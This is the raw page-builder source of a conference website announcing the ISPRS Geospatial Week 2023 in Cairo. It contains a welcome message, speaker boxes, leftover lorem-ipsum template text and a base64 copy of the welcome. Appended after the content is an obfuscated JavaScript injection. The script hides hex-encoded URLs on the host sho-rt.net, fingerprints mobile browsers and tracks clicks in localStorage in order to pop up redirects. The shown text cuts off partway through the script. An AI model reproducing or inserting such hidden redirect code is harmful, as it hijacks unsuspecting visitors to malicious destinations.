sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"]</p>\n<h5>&lt;p <span class=\"html-attribute-name\">style</span>=\"<span class=\"html-attribute-value\">text-align: justify;</span>\"&gt;As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.&lt;/p&gt;</h5>\n<p>[/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQ2JyJTJGJTNFQ2xpY2slMjBlZGl0JTIwYnV0dG9uJTIwdG8lMjBjaGFuZ2UlMjB0aGlzJTIwaHRtbCUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 